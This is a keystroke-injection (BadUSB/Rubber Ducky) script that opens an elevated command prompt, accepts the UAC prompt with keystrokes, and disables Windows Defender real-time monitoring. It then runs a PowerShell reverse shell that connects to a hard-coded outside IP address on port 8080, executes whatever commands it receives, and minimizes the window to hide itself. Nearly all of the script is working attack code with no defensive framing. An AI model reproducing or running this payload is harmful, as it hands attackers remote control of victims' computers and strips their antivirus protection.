REM run cmd as administrator
WINDOWS
DELAY 500
STRING cmd
DELAY 500
CTRL-SHIFT ENTER
DELAY 500
TAB
DELAY 300
TAB
DELAY 300
ENTER
DELAY 500

REM run powershell reverse shell script, bypass Windows Defender
STRING powershell
ENTER
DELAY 500
STRING Set-MpPreference -DisableRealtimeMonitoring $true
DELAY 300
ENTER
DELAY 300
STRING $client = New-Object System.Net.Sockets.TCPClient('193.106.55.114',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);try { $sendback = (iex ". { $data } 2>&1" | Out-String ); } catch { $sendback = "$_`n"}; $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
DELAY 300
ENTER
DELAY 300

REM minimize window
WINDOWS DOWN